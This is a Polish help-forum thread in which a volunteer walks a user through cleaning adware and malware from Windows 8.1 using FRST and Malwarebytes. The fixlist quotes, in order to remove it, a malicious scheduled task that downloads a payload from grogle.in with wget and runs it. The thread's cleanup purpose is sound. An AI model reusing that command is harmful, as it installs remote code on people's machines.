Problem z Wirusem Windows 8.1, Firefox, Avast

senfren · 2 Luty 2015 10:32

Witam mam z tym problem od zainstalowania programu Avast co chwila te komunikaty szału można dostać z tym

http://imagizer.imageshack.us/a/img912/1901/qHG2Mr.png

tu podaje wklejki z programu FRST

FRST.txt: http://www.wklej.org/id/1620550/

Addition.txt: http://www.wklej.org/id/1620547/

tyle zrobiłem reszty nie wiem co i jak więc proszę o pomoc

Atis · 2 Luty 2015 10:43

Odinstaluj Search App by Ask .

Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist :

CloseProcesses:
HKLM-x32\...\Run: [ApnTBMon] => C:\Program Files (x86)\AskPartnerNetwork\Toolbar\Updater\TBNotifier.exe [1949080 2014-12-19] (APN)
HKLM\...\Policies\Explorer: [NoFolderOptions] 0
HKLM\...\Policies\Explorer: [NoControlPanel] 0
Startup: C:\Users\Michał\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HDDlife.lnk
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = 
SearchScopes: HKU\S-1-5-21-1560509816-1853623272-2328866619-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
FF SearchPlugin: C:\Users\Michał\AppData\Roaming\Mozilla\Firefox\Profiles\by65yqpl.default\searchplugins\ask-search.xml
R2 APNMCP; C:\Program Files (x86)\AskPartnerNetwork\Toolbar\apnmcp.exe [177560 2014-12-19] (APN LLC.)
U3 DfSdkS; No ImagePath
U0 msahci; system32\drivers\msahci.sys
2015-02-02 09:42 - 2014-07-29 04:02 - 00000000 ____ D () C:\ProgramData\McAfee
2015-01-23 21:15 - 2015-01-23 21:15 - 00000000 ____ D () C:\Users\Michał\AppData\Local\AskPartnerNetwork
2015-01-23 21:15 - 2015-01-23 21:15 - 00000000 ____ D () C:\ProgramData\AskPartnerNetwork
2015-01-23 21:15 - 2015-01-23 21:15 - 00000000 ____ D () C:\ProgramData\APN
2015-01-23 21:15 - 2015-01-23 21:15 - 00000000 ____ D () C:\Program Files (x86)\AskPartnerNetwork
2015-01-17 16:12 - 2015-02-02 10:45 - 00024576 _____ () C:\ProgramData\dat.bmp
2015-01-09 20:59 - 2015-01-09 20:59 - 00401408 _____ () C:\ProgramData\wget.exe
Task: {26575DAD-9B38-47F4-811F-1CB2A93B9559} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" &amp; ping 1.1.1.1 -n 300 -w 1000 &amp; wget -t 0 --retry-connrefused -O dat.bmp http://grogle.in/dat.bmp?data=iFXHmJSBBG;CursorFXPlus211_setup.exe;1420833603 &amp; start cmd /R dat.bmp <==== ATTENTION
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
EmptyTemp:

Uruchom FRST i kliknij Fix. Pokaż raport z usuwania Fixlog.

Kliknij Scan i pokaż nowy raport z FRST bez Addition.

senfren · 2 Luty 2015 22:47

Fixlog: http://www.wklej.org/id/1621626/

FRST: http://www.wklej.org/id/1621627/

Atis · 2 Luty 2015 23:08

Skasuj folder C:\FRST

Usuń stare punkty przywracania: Przywracanie systemu i kopie w tle

Dysk przeskanuj Malwarebytes Anti-Malware

Podczas instalacji usuń zaznaczenie przy Uruchom okres testowy Malwarebytes Anti-Malware Premium.

http://wstaw.org/m/2014/03/25/2014-03-25_123039.png

Język PL > Settings > General Settings > Language > Polish

senfren · 3 Luty 2015 00:25

Dzięki wielkie za pomoc, problem znikną jak na razie